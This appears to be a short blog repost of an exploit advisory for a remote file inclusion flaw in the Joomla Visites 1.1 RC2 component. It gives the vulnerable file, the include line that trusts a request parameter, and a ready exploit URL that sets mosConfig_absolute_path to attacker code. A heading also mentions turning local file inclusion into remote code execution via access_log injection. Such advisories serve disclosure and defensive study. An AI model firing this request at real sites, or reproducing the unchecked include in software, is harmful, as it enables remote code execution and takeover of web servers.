LFI to RCE via access_log injection

on
18

Joomla Visites 1.1 RC2 - RFI

on 

[o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability
Software : com_joomla-visites version 1.1 RC2
Vendor   : http://www.joomla-visites.net/
Author   : NoGe


[o] Vulnerable file
administrator/components/com_joomla-visites/core/include/myMailer.class.php
require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';


[o] Exploit
http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]


[o] Publish
http://milw0rm.com/exploits/5497


Comments

labatterie said…
The more useful information here.
December 2, 2010 at 9:05 PM
Post a Comment